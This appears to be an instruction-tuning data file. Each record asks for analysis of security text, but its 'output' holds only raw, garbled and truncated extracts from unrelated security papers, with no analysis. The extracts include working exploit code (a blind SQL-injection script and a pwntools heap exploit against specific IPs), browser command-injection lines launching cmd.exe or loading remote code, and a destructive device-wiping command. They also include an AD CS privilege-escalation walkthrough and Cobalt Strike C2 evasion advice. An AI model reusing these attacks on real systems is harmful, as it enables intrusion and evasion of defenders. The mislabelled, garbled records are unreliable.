{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLCTF-Writeup by Nu1L Web L PLAYGROUND djdemourlssrffuzz6379 redis nginx/static../ pycflagsessiondata sessionidsessiondataflag linux0fuzz0:8000CRLF redisseturlvps302sessiondata append Simple blog swpivcbcsprintf http://211.159.161.162/test.php? submit=%E6%8F%90%E4%BA%A4&site=file%3A%2F%2Fwww.baidu.com%2F/home/lctf/flag%23 www.baidu.comlocalhosthost preg_matchphp phpphp config.php base64flag Pwn Shopping? removeitem nameUAF import requests dic='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ._@, {}*&$#!=-' table_name='' for i in range(1,200): for j in dic: cookiess= {\"PHPSESSID\":\"3k9s8s0iv6dn3gq7gpaime69a7\",\"token\":\"VEdsdVRKQnF5aFdCYzR3bw%3 D%3D\"} url =\"http://111.231.111.54/admin.php? title=%1$'%20or(if((ascii(mid((select%20`f14g`%20from%20`key`),\"+str(i)+\",1 )))=\"+str(ord(j))+\",0,1)=1)%23&id=1\" resp = requests.get(url, cookies=cookiess,headers={'Content- Type':'application/x-www-form-urlencoded'}) if 'exist.' in resp.content: table_name += j print table_name break from pwn import * LOCAL = 0 DEBUG = 0 VERBOSE = 0 context.arch = 'amd64' if VERBOSE: context.log_level = 'debug' if LOCAL: io = process('./shopping') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') if DEBUG: gdb.attach(io) else: io = remote('111.231.13.178', 20002) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def look(choice1, choice2, remark, msg=None): io.recvuntil('your choice: ') io.sendline('1') io.recvuntil('[n] back\\n: ') io.sendline(choice1) io.recvuntil('? ') io.sendline(choice2) io.recvuntil(': ') io.send(remark) if msg: io.recvuntil('?\\n') io.send(msg) io.recvuntil('? ') io.sendline('n') io.recvuntil('[n] back\\n: ') io.sendline('n') def remove(name): io.recvuntil('your choice: ') io.sendline('2') io.recvuntil('? ') io.send(name) for i in range(5): look('a', 'A', '1\\n') for i in range(3): look('a', 'A', '2\\n') io.recvuntil('your choice: ') io.sendline('1') io.recvuntil('[n] back\\n: ') io.sendline('a') for i in range(91): io.recvuntil('Which book? ') io.sendline('A') io.recvuntil('remark:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncalc && notepad chrome.exe urlstr https://www.baidu.com --gpu-launcher=\"cmd.exe\" chrome.exe https://www.baidu.com --gpu-launcher=\"cmd.exe\" chrome chrome.exe https://www.baidu.com --no-sandbox --gpu-launcher=\"cmd.exe\" 0x00 0x01 Chrome QQ chrome.exe https://www.baidu.com --gpu-launcher=\"cmd.exe\" 360 chrome.exe https://www.baidu.com --no-sandbox --gpu-launcher=\"cmd.exe\" Components.utils.import(\"resource://gre/modules/Subprocess.jsm\"); let opt = { command: \"C:\\\\windows\\\\system32\\\\calc.exe\", arguments: [], workdir: \"C:\\\\windows\\\\system32\", stderr: \"pip e\"}; let x = Subprocess.call(opt); -greomni \"\\\\remoteHost\\omni.ja\" -appomni \"\\\\remoteHost\\omni2.ja firefox.exe https://www.baidu.com\\t-new-window 0x02 - 0x03 -  firefox.exe https://www.baidu.com\\t-new-window\\thttps://beef\\t-headless   0x04 -  firefox.exe https://www.baidu.com\\t-new-window\\thttps://beef\\t-headless\\t-new-instance -P default 0x05", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 解决方案汇总 本篇整理一些态势感知相关的技术框架和相关模型 ### 1. 安全运营+情报 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200714143330.png) Fig. 安全运营中威胁情报的应用 ## References [1] 安全运营中威胁情报的应用姜明元https://cloud.ssetech.com.cn/p/DUf-3PEQtwcY7gg", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"COPY\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME COPY \\- 在表和文件之间拷贝数据 .SH SYNOPSIS .sp .nf COPY \\fItablename\\fR [ ( \\fIcolumn\\fR [, ...] ) ] FROM { '\\fIfilename\\fR' | STDIN } [ [ WITH ] [ BINARY ] [ OIDS ] [ DELIMITER [ AS ] '\\fIdelimiter\\fR' ] [ NULL [ AS ] '\\fInull string\\fR' ] ] COPY \\fItablename\\fR [ ( \\fIcolumn\\fR [, ...] ) ] TO { '\\fIfilename\\fR' | STDOUT } [ [ WITH ] [ BINARY ] [ OIDS ] [ DELIMITER [ AS ] '\\fIdelimiter\\fR' ] [ NULL [ AS ] '\\fInull string\\fR' ] ] .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBCOPY\\fR 在 PostgreSQL表和标准文件系统文件之间交换数据 COPY TO 把一个表的所有内容都拷贝到一个文件 而 COPY FROM 从一个文件里拷贝数据到一个表里把数据附加到表中已经存在的内容里 .PP 如果声明了一个字段列表COPY 将只在文件和表之间拷贝声明的字段的数据 如果表中有任何不在字段列表里的字段那么 COPY FROM 将为那些字段插入缺省值 .PP 带文件名的 COPY 指示 PostgreSQL 服务器直接从文件中读写数据 如果声明了文件名那么该文件必须为服务器可见而且文件名必须从服务器的角度声明如果声明的是 STDIN 或 STDOUT数据通过连接在客户前端和服务器之间流动 .SH \"PARAMETERS 参数\" .TP \\fB\\fItablename\\fB\\fR 现存表的名字可以有模式修饰 .TP \\fB\\fIcolumn\\fB\\fR 可选的待拷贝字段列表如果没有声明字段列表那么将使用所有字段 .TP \\fB\\fIfilename\\fB\\fR 输入或输出文件的绝对路径名 .TP \\fBSTDIN\\fR 声明输入是来自客户端应用 .TP \\fBSTDOUT\\fR 声明输入前往客户端应用 .TP \\fBBINARY\\fR 使用二进制格式存储和读取而不是以文本的方式 在二进制模式下不能声明 DELIMITERS和NULL .TP \\fBOIDS\\fR 声明为每行拷贝内部对象标识OID 如果给那些没有 OID 的表声明了 OIDS 选项则抛出一个错误 .TP \\fB\\fIdelimiter\\fB\\fR 用于在文件中每行中分隔各个字段的单个字符 缺省是水平制表符tab .TP \\fB\\fInull string\\fB\\fR 一个代表 NULL 值的字串缺省是 \\\\N 反斜杠-N 当然你可以自己挑一个空字串 .sp .RS .B \"Note:\" 注意: 对于COPY FROM任何匹配这个字串的字串将被存储为 NULL 值 所以你应该确保你用的字串和COPY TO相同 .RE .sp .SH \"NOTES 注意\" .PP \\fBCOPY\\fR 只能用于表不能用于视图 .PP BINARY 关键字将强制使用二进制对象而不是文本存储/读取所有数据 这样做在一定程度上比传统的拷贝命令快但二进制拷贝文件在不同机器体系间的植性不是很好 .PP 你对任何要COPY TO 出来的数据必须有选取数据的权限对任何要 COPY FROM 入数据的表必须有插入权限 .PP COPY 命令里面的文件必须是由服务器直接读或写的文件而不是由客户端应用读写 因此它们必须位于数据库服务器上或者可以为数据库服务器所访问而不是由客户端做这些事情 它们必须是PostgreSQL用户服务器运行的用户 ID可以访问到并且可读或者可写而不是客户端 COPY 到一个命名文件是只允许数据库超级用户进行的因为它允许读写任意服务器有权限访问的文件 .PP 不要混淆 COPY 和 psql 指令 \\fB\\\\copy\\fR \\fB\\\\copy\\fR 调用 COPY FROM STDIN 或者 COPY TO STDOUT 然后把数据抓取/存储到一个 psql 客户端可以访问的文件中 因此使用 \\fB\\\\copy\\fR 的时候文件访问权限是由客户端而不是服务器端决定的 .PP 我们建议在 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Diffie-Hellman 1 (crypto 300) ###ENG [PL](#pl-version) In the task we want to generate a shared secret via Diffie Hellman protocol. We have 3 participants, but we know all the parameters only for 2 of them. We are given: ``` p = 8986158661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251 g = 6 gc = 5361617800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617 # gc mod p a = 230 b = 250 ``` So we know the secret values for participants `a` and `b` but for participant `c` we know only the public part of his secret - `gc mod p`. Forunately this is all we need to establish the shared key. After all this is how it's done in real life - everyone gets only this public secret. The shared secret is simply `gabc mod p`, and for this we don't need `c` if we already have `gc mod p`: ```python secret = pow(pow(gc, a, p), b, p) ``` And the first 20 characters are the flag: ```38058349620867258480``` ###PL version W zadaniu chcemy wygenerować wspólny klucz za pomocą protokołu Diffiego Hellmana. Mamy 3 uczestników ale znamy wszystkie parametry tylko dla 2 z nich. Znamy: ``` p = 8986158661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251 g = 6 gc = 5361617800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617 # gc mod p a = 230 b = 250 ``` Więc mamy sekretne wartości dla uczestników `a` oraz `b` ale dla `c` znamy tylko publiczną cześć jego sekretu - `gc mod p`. Szczęśliwie to jest wszystko co potrzebujemy aby ustanowić wspólny klucz. Generalnie tak przebiega to w prawdziwym życiu - każdy inny uczestnik zna tylko publiczny sekret. Wspólny sekret to po prostu: `gabc mod p`, a do tego nie potrzeba nam wartości `c` ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhttp://Irongeek.com Adrian Crenshaw Project site: http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle http://Irongeek.com  Tenacity Solutions http://www.tenacitysolutions.net/  Kentuckiana ISSA http://www.issa-kentuckiana.org/  PJRC http://www.pjrc.com/ http://Irongeek.com  I run Irongeek.com  I have an interest in InfoSec education  I dont know everything - Im just a geek with time on my hands http://Irongeek.com  I was given a device called a Phantom Keystroker as a speakers gift for doing a FireSide talk at Shmoocon 2010  The Keystroker was meant to annoy someone by sending keystrokes and mouse movements to their computer  But, what if it was programmable? http://Irongeek.com  Darren Kitchen (media mogul) and Robin Wood (code deity)  I knew Darren had been working with the U3 thumb drives for automated attacks, so I went to him with the idea  Devious minds think alike! They were already developing it!  They are working on a product (USB Rubber Ducky): http://www.hak5.org/store Darren Kitchen http://hak5.org Robin Wood http://digininja.org http://Irongeek.com  For those that like to Go ugly early, hold on for the rest of this presentation  Three notes in my defense: 1. Im new to microcontrollers 2. I suck at soldering (Like an epileptic alcoholic with DTs soldering with an aluminum baseball bat) 3. I apparently suck at using rotary tools too http://Irongeek.com  Likely types faster than you can, without errors  Works even if U3 autorun is turned off  Draws less attention than sitting down in front of the terminal would. The person turns their head for a minute, the pen-tester plugs in their programmable USB key stroke dongle, and Bobs your uncle, instant pwnage.  Can also be set to go off on a timer when you know a target will be logged in  Just use your imagination! http://Irongeek.com  Add a user  Run a program  Copy files to your thumbdrive for later retrieval  Upload local files  Download and install apps  Go to a website they hav", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 磁盘内存分析 ## 常用工具 - EasyRecovery - MedAnalyze - FTK - [Elcomsoft Forensic Disk Decryptor](https://ctf-wiki.github.io/ctf-tools/misc/#_6) - Volatility ## 磁盘 常见的磁盘分区格式有以下几种 - Windows: FAT12 -> FAT16 -> FAT32 -> NTFS - Linux: EXT2 -> EXT3 -> EXT4 - FAT 主磁盘结构 - 删除文件目录表中文件名第一字节 `e5` ## VMDK VMDK 文件本质上是物理硬盘的虚拟版也会存在跟物理硬盘的分区和扇区中类似的填充区域我们可以利用这些填充区域来把我们需要隐藏的数据隐藏到里面去这样可以避免隐藏的文件增加了 VMDK 文件的大小如直接附加到文件后端也可以避免由于 VMDK 文件大小的改变所带来的可能导致的虚拟机错误而且 VMDK 文件一般比较大适合用于隐藏大文件 ## 内存 - 解析 Windows / Linux / Mac OS X 内存结构 - 分析进程内存数据 - 根据题目提示寻找线索和思路提取分析指定进程的特定内存数据 ## 题目 - Jarvis OJ - MISC - 取证 2 ## 参考 - [数据隐藏技术](http://wooyun.jozxing.cc/static/drops/tips-12614.html)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking 911: Adventures in Disruption, Destruction, and Death quaddi, r3plicant & Peter Hefley August 2014 Jeff Tully Christian Dameff Peter Hefley Physician, MD Emergency Medicine Open CTF champion sudoers- Defcon 16 Speaker, Defcon 20 Physician, MD Pediatrics Wrote a program for his TI-83 graphing calculator in middle school Speaker, Defcon 20 IT Security, MSM, C|CISO, CISA, CISSP, CCNP, QSA Senior Manager, Sunera Gun hacker, SBR aficionado This talk is neither sponsored, endorsed, or affiliated with any of our respective professional institutions or companies. No unethical or illegal practices were used in researching, acquiring, or presenting the information contained in this talk. Do not attempt the theoretical or practical attack concepts outlined in this talk. This talk includes disturbing audio clips. Disclaimer Outline - Why This Matters (Pt. 1) - 911 Overview - Methodology - Attacks - Why This Matters (Pt. 2) Why This Matters (Pt. 1) 4/26/2003 9:57pm Emergency Medical Services (EMS) Research Aims  Investigate potential vulnerabilities across the entire 911 system  Detail current attacks being carried out on the 911 system  Propose solutions for existing vulnerabilities and anticipate potential vectors for future infrastructure modifications Methodology  Interviews  Regional surveys  Process observations  Practical experimentation  Solution development Wired Telephone Call End Office Selective Router PSAP ALI Database Voice Only Voice and Data Data Voice Voice + ANI Voice + ANI ANI ALI Wireless Phase 1 Telephone Call Mobile Switching Center Selective Router PSAP ALI Database Voice Only Voice and Data Data Voice Voice + pANI/ESRK Voice + pANI/ESRK pANI / ESRK ALI Cell Tower Voice Callback # (CBN) Cell Tower Location Cell Tower Sector pANI / ESRK CBN, Cell Tower Location, Cell Tower Sector, pANI / ESRK Mobile Positioning Center Wireless Phase 1 Data Wireless Phase 2 Telephone Call Mobile Switching Center Selective Router PSAP ALI Database Voice Only Voice and", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMikroTik Complete Solution for ISP  Building and Running a Successful WISP  MikroTik in Real Life, Full and Low Budget ISP  X2com and MikroTik: New Core Network Case Study  How to Build an ISP Business with Mikrotik Only  Basic Mistakes by ISP's on Network Setup & BGP  ISP Design  Using MikroTik CHR as a BGP Edge Router  Providing TriplePlay Services (Internet, VoIP, IPTV) For Small Towns Using Wi-Fi Directional Radio Channels  Security Challenges for ISPs and WISPs                        809f93cbcfe5e45fae5d69ca7e64209c02647660d1a79b52ec6d05071b21f 7ff2e167370e3458522eaa7b0fb81fe21cd7b9dec1c74e7fb668e92e2610 81368d8f30a8b2247d5b1f8974328e9bd491b574285c2f132108a542ea7d3 b301d6f2ba8e532b6e219f3d9608a56d643b8f289cfe96d61ab898b4eab0e 99e1db762ff5645050cea4a95dc03eac0db2ceb3e77d8f17b57cd6e294404 76bf646fce8ff9be94d48aad521a483ee49e1cb53cfd5021bb8b933d2c4a7 e009b567516b20ef876da6ef4158fad40275a960c1efd24c804883ae2735 7c06b032242abefe2442a8d716dddb216ec44ed2d6ce1a60e97d30dbba1fb f8080b9bfc1bd829dce94697998a6c98e4eb6c9848b02ec10555279221dd 4e350d11b606a7e0f5e88270938f938b6d2f0cc8d62a1fdd709f4a3f1fa2c f1cf895d29970c5229b6a640c253b9f306185d4e99f4eac83b7ba1a325ef 8395e650e94b155bbf4309f777b70fa8fdc44649f3ab335c1dfdfeb0cdee4 a249a69e692fff9992136914737621f117a7d8d4add6bac5443c002c379fe 5e75b8b5ebbef78f35b00702ced557cf0f30f68ee08b399fc26a3e3367bb fe022403a9d4c899d8d0cb7082679ba608b69091a016e08ad9e750186b194 116d584de3673994e716e86fbb3945e0c6102bfbd30c48b13872a808091e 4263c93ce53d7f88c62fecb6a948d70e51c19e1049e07df2c70a467bcefee 5d70 7dd5872 0d7d0f7015 11400 891 939549 01922bff2bb 3b7d5d                                                                                                                                                                  echo lol > /var/pdb/system/image  reboot", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n针对域证书服务的攻击1- ESC1 0x00 前言 关于域证书服务攻击的白皮书出来大半个月了 https://www.specterops.io/assets/resources/Certified_ Pre-Owned.pdf下文以白皮书代指作者也在BH21后放出了利用工具在前期大家的主要关注点都集 中在NTLM relay ad cs HTTP来获取域控权限的ESC8上其实白皮书中关于攻击项的技术有19个我计 划边学边写这个过程中难免出错望指正 昨天我把域环境搭建好同时也在其中一台服务器上开启了AD CS服务打算试试Certify和ForgeCert工 具在测试Certify工具的时候看到github的issue的几个讨论就有不好的预感果不其然在编译的 时候就报错了 我的编译环境是Win10 2004VS2019.NET4解决比较简单修改Certify.csproj文件中多处 然后在非域用户登录的域内机器上执行 因此判定这个工具基本无法在域外使用但从我对原理的粗浅理解来看是可以实现在域外利用的工具 的这儿暂时跳过我使用域用户登录域内机器成功执行 <LangVersion>0.9</LangVersion> 改为 <LangVersion>default</LangVersion> AttackTeamFamily No. 1 / 8 - www.red-team.cn 瞬间就尴尬了没有危害还没开始就结束了好吧测试之前我们先来配置危害环境ps文中该 用漏洞一词的地方我全部以危害代替原因大家都清楚 0x02 危害环境配置 我们对白皮书中攻击项的利用进行分类 窃取类 个体权限维持类类似银票后文以银证称呼 权限提升类 域权限维持类类似金票后文以金证称呼 我们先测试里面的权限提升类这也是大家比较关注的其他类需要提升权限以后再利用今天我们主 要是测试ESC1Domain escalation via No Issuance Requirements + Enrollable Client Authentication/Smart Card Logon OID templates + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT这句 话表达了3个点 我们需要有权限去获取证书 能够登记为客户端身份验证或智能卡登录等 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT开启 我们首先创建一个具有以上3个点的证书模板使用certtmpl.msc创建我们复制工作站身份认证模 板在常规中修改模板显示名称为ESC1扩展中的应用程序策略中加入客户端身份认证 AttackTeamFamily No. 2 / 8 - www.red-team.cn 在安全中加入Domain Users具有注册权限 AttackTeamFamily No. 3 / 8 - www.red-team.cn 在使用者名称中选择在请求中提供也就是开启CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT AttackTeamFamily No. 4 / 8 - www.red-team.cn 然后使用Certsrv.msc发布我们创建的危害模板 AttackTeamFamily No. 5 / 8 - www.red-team.cn 然后刷新刷新稍等下使用certify检测危害 危害出现了 0x03 ESC1利用 利用就很简单了这儿Certify.exe工具有2个DLL依赖需要复制到同目录下还没研究怎么搞成一个 exe不然使用很麻烦我们暂时先复制DLL依赖测试后面再完善利用工具 Certify.exe find /vulnerable AttackTeamFamily No. 6 / 8 - www.red-team.cn 成功获取到证书注意altname参数这个需要填的是域管用户名然后算换pem到pfx这个需要使用 linux或者macos环境中的opnessl我windows上装有WLS直接开个WLS挺方便的 最后使用Rubeus获取TGT我这儿直接就ptt了这儿需要注意的是要ptt当然是需要管理员权限的 0x04 总结 这就是ESC1的错误配置利用了本文没有涉及到原理只从配置和攻击利用上编写感官上可能会觉得 这样的错误配置在真实环境中多么这个我也不确定但据作者白皮书描述多因为这3个配置不全是 人为配置有些是默认配置例如web服务器模板里面默认CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT开 启用户模板里面默认domian users有注册权限我上面演示的模板默认在应用策略配置中就有客户端 认证配置因此ESC1这样情况的错误配置应该挺常见的 原理部分我会单独写因为我目前也是学习阶段理解的还不够深刻后面再补上", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nINSIDE THE MEET DESAI ATTACK: DEFENDING DISTRIBUTED TARGETS FROM DISTRIBUTED ATTACKS @CINCVOLFLT (TREY FORGETY) HACKER, LAWYER NAVIGATOR, PHYSICIST NENA: The 9-1-1 Association improves 9-1-1 through research, standards development, training, education, outreach, and advocacy. www.NENA.org IN NOVEMBER, 2016, A TEENAGER FROM ARIZONA LAUNCHED A TDoS ATTACK ON 9-1-1 CENTERS IN SEVERAL STATES WITH 8 LINES OF CODE AND A TWEET MATHEMATICAL ASIDE: MR. ERLANGS MAGIC FORMULA 𝑷𝑷𝒃𝒃 = 𝑩𝑩 𝑬𝑬, 𝒎𝒎 𝑬𝑬𝒎𝒎 𝒎𝒎!  𝑬𝑬𝒊𝒊 𝒊𝒊! 𝒎𝒎 𝒊𝒊+𝟎𝟎 𝑷𝑷𝒃𝒃 = 𝑬𝑬𝒎𝒎 𝒎𝒎!  𝑬𝑬𝒊𝒊 𝒊𝒊! 𝒎𝒎 𝒊𝒊+𝟎𝟎 𝑃𝑃. = 𝐸𝐸0 𝑚𝑚!  𝐸𝐸2 𝑖𝑖! 0 2+4 Pb is Probabilty of Blocking: How often can a {call, agent, GET} fail? This is a design criterion: How much failure can we tolerate? 𝑃𝑃. = 𝐸𝐸0 𝑚𝑚!  𝐸𝐸2 𝑖𝑖! 0 2+4 m is the # of identical, parallel resources How many {lines, bps, servers} do we have? This is a design constraint: How many widgets can we afford? 𝑃𝑃. = 𝐸𝐸0 𝑚𝑚!  𝐸𝐸2 𝑖𝑖! 0 2+4 E is the normalized ingress load How many {calls, bps, GETs} do we expect? This is a design estimate: How much traffic is normal? But: What does it mean to have a load of calls, when their arrivals and lengths are (mostly) random? The normalized ingress load, E: 𝛌𝛌 is the # of calls per unit time This is an observation or estimate: How many calls do we expect to arrive each second in our busiest hour? 𝐸𝐸 = 𝜆𝜆ℎ The normalized ingress load, E: h is the average holding time This is an observation or estimate: How long do our calls take to service, on average? 𝐸𝐸 = 𝜆𝜆ℎ 𝑃𝑃. = 𝐸𝐸0 𝑚𝑚!  𝐸𝐸2 𝑖𝑖! 0 2+4 High-Ingress-Rate Vulnerability: For 𝐸𝐸  𝑚𝑚, 𝑃𝑃.  1 This is could be due to higher-than- expected arrival rate, or longer-than- expected holding time. BEN GURION UNIVERSITY: ESTIMATED 1.7053 TRUNKS PER 10,000 POPULATION 75% SHARED / 9.5% WIRELESS-ONLY NENA: PROBABLY <= 12 WIRELESS TRUNKS PER PSAP (ON AVERAGE) EXAMPLE: BG PAPER PREDICTS ~79-95 WIRELESS-USABLE TRUNKS FOR DENVER (PROPER) (663K POPS) EXAMPLE: DENVER REPORTS 32 ~2.5-3X < PREDICTION 2012 TDoS/Cyber WG FOCI: ANDROID ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n做红队你需要学习如何挖掘战壕三 0x00 前言 在前两篇的文章中我们先是分析了红队基础设施架构并指出构成的3大元素ip和域名C2工具 前置器然后我们在第二篇文章中针对ip和域名的选择做了分享这是第三篇我们将是分析C2工具 这儿的C2工具主要使用的是CobaltStrikeCobaltStrike功能强大此处仅分析和我们红队基础设施相关 的部分 0x01 Payload加载流程 为什么红队基础设施要讲Payload加载呢因为这涉及到Payload分段加载和放置位置的问题如果 Payload使用分段加载一定要注意远程下载Payload的时候Payload不一定是放置在TeamServer服务 器上的也有可能是其他公开服务上例如阿里云代码库GithubQQ空间等等因此明白了CS关 于植入体的加载流程既能方便我们定制化植入体也能方便基础设施灵活部署 关于CS的Payload加载首先我们需要知道CS植入体的组成CS植入体的组成抽象出来就是 Loader+shellcode的组合在CS中loader包含2种 一种是powershell也就是你使用Attacks-->Packages-->Payload Generator- >Output(PowerShell/PowerShell Command)这样生成的是一个植入体Loader+shellcode,不过 Loader是一段Powershell代码上面路径种Output如果选其他的语言那么生成的就仅仅是shellcode 了需要自行编写Loader执行shellcode 另外一种是可执行的文件使用Attacks-->Packages-->Windows Executeable/Windows Executeable(S)生成的植入体使用的是C编写的Artifact作为Loader形式上可以是exeDLL作者也 提供了ArtifactKit的源码方便我们编写这个Loader 这样的植入体在目标机器上执行的时候都会去下载Beacon.dll而Windows Executeable(S)生成 的植入体为Stageless植入体也就是说包含了Beacon.dll这样的植入体就不会去下载Beacon.dll了 具体如图所示 在CS中还提供了Scripted Web Delivery功能允许URL远程下载可以执行文件或脚本CS在植入体这 块儿提供了极大的灵活性和自定义性方便我们和多种外部技术协助例如白利用自研Loader Word宏等等 AttackTeamFamily No. 1 / 4 - www.red-team.cn 0x02 CS的通信协议 DNS协议 在CS中包含了HTTP(S)DNSTCPSMB四种协议同时也支持自定义协议在这儿主要分析 HTTP(S)DNS的使用因为TCPSMB主要用作内网横向使用自定义协议也不在本文分析范畴 首先是DNS协议这个协议在当前的CS4.3版本中做了强化我们看下具体参数 首先我们关注默认参数默认参数必须修改这一定是防御产品的重要指标从防御的角度出发DNS 通道的防御主要以频率数据特征数据大小等异常行为为主现在再加入机器学习就更是难搞 了因此默认指标必须修改下面说几个特别重要的 dns_idle没有任务时解析的IP解析到一个任意白IP什么叫白IP请阅读上一篇文章 dns_max_txtDNS TXT的大小我是建议100以下 dns_sleepDNS请求间隔时间我个人是2-5秒之间 maxdnshostname最大长度我一般是60以下 其他指标模仿正常数据例如子域名经常出现apicdnjs等等TXT记录中经常出现SPF DKIM之类的 如果按照我建议的设置DNS通道你会发现奇慢无比可能一条命令半个小时在第一篇中我就说 过DNS记录容易被检测不要用作命令通道可以用作潜伏通道但是也有例外就是实战中只有 DNS出网没有办法在确认了防御设备情况后再使用DNS做命令通道做命令通道时调整以上参数 的大小加快DNS通道的速度DNS通道绝对不适合做数据通道数据密取一般都不小你搞DNS通道 传基本等于自杀 HTTP(S)协议 HTTP(S)协议才是CS的主要协议你基本90%的时间在使用这个协议CS提供了强大的流量自定义功 能主要是在C2profile中配置相对于DNS协议的配置HTTP(S)的配置大家应该熟悉不少因为目前 情况下不配置C2prodile基本不可能过防御设备网上公布的C2profile也是防御设备提取特征的重 要来源因此也不能用所以学习C2profile的配置非常重要具体配置各位去https://www.cobaltstri ke.com/help-malleable-c2学习我这里只说一些重要的和一些注意事项 AttackTeamFamily No. 2 / ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n细数安卓APP那些远程攻击漏洞 z7sky & 行之 @360VulpeckerTeam 演讲者简介 weibo: @0xr0ot @z7sky z7sky & 行之 360VulpeckerTeam成员 研究方向Android 系统安全和第三方APP 安全 概览 Mobile Pwn2Own 2013 Mobile Pwn2Own 2013上安全研究人员Pinkie Pie 利用chrome的两个0day漏洞实现了远 程代码执行攻击通过远程的web页面控制了系统 随后,2014年日本安全研究人员Takeshi Terada 公布了Pwn2own 大赛exploit中intent协议漏 洞的利用方法 影响面最大的远程攻击入口 意图协议和第三方协议 协议漏洞 Intent协议漏洞 Chrome v18及更早版本,可以通过为iframe的src属性设置自定义的scheme 实现从Web页面启动一个本地应用其他android浏览器也支持Chrome v25及 其之后稍微有了些变化取而代之的是通过自定义的scheme或者intent:来 实现 Intent Scheme Url 如果浏览器支持intent scheme url一般 会分三个步骤处理 1.使用Intent.parseUri(uri);解析url生成 intent对象 2.对intent对象进行过滤不同的浏览器过 滤规则有差异 3.通过Context#startActivityIfNeeded()或 Context#startActivity()等传递步骤2中经过 过滤后的intent来启动activity intent:mydata#Intent;action=com.me.om;S.url=file:///mnt/sdcard/Down load/xss.html;SEL;component=com.ex.uritest/com.ex.uritest.MainActiv ity;end 另外可以为其设置备用页面当intent无法被解析或者外部应用不能被启 动时用户会被重定向到指定页面 S.browser_fallback_url=[encoded_full_url] extra data selector intent 设置了selector intent 的activity 语法示例 BROWSABLE Category 在继续介绍前先了解两个概念 1. android.intent.category.BROWSABLE 这个属性配置在AndroidManifest.xml文件中如果应用组件支持这 个category表明这个组件通过浏览器打开是安全的不会对应用自身 产生危害所以当自己的应用组件比较脆弱或者存在重要业务逻辑时 一般建议禁止使用这个属性 Selector Intent 2. Selector Intent Android API level 15(Android 4.0.3) 引进了Selector intent机制这个selector intent可以被绑定到一个main intent上如果这个main intent拥有selector intent,那么 Android Framework会解析selector intent intent://appscan#Intent;S.url=file:///mnt/sdcard/Download/xss.html;SEL;component=com. ex.uritest/com.ex.uritest.MainActivity;end SEL表明为com.ex.uritest.MainActivity设置了一个selector intent,那么android framework会解析这个selector intent即使com.ex.uritest.MainActivity没有 android.intent.category.BROWSABLE category 利用SEL特性就可以绕过chrome的一些安全限制 Intent intent = Intent.parseUri(uri); intent.addCategory(android.intent.category.BROWSABLE); intent.setComponent(null); context.startActivityIfNeeded(intent, -1); 1.强制限制只有Category为android.intent.category.BROWSABLE的activity组件 才能接收它的intent 2.禁止显式调用 Chrome浏览器的绕过与防护 现在最新的chrome版本已经对selector intent增加了过滤规则", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# sigNULL * Category: Web * 550 Points * Solved by the JCTF Team ## Description > Jeff Bezos is using the super secure SigNULL messaging service. > > Our best hackers have not been able to find a way to leak the flag from his inbox. You can contact him by sending a message to `0399bf35-5fb7-402b-ba56-8d85d4f09d29`. > > Do you have what it takes to get the flag? ## Solution We visit the attached website and are prompted to create a new account: ![](images/signull1.png) Once we create the account, we get a set of a private and public key: ``` Public Key: f2456c40-3cbf-4d48-ad3a-9c87969921ff Private Key: 6e1b371a-66e0-43ff-8d0d-8a6910d21263 ``` The interface we receive is: ![](images/signull2.png) Using Jeff's public key, we can send him a message: ![](images/signull3.png) After chatting for a while, we get a clue: ![](images/signull4.png) Well, he asked for it: ![](images/signull5.png) Jeff assures us that he will watch the video. Can we send him some other link? ![](images/signull6.png) Digging through the Javascript sources, this looks like a React application. We can find the following YouTube-related logic: ```javascript // ... E = /https?:\\/\\/[.]+\\.youtube\\.com\\/embed\\//i; // ... t.preventDefault(), n && U ? ((a = U.toString()).startsWith(\"https://www.youtube.com/watch?v=\") && (a = a.replace(\"watch?v=\", \"embed/\")) // ... ``` The regular expression seems 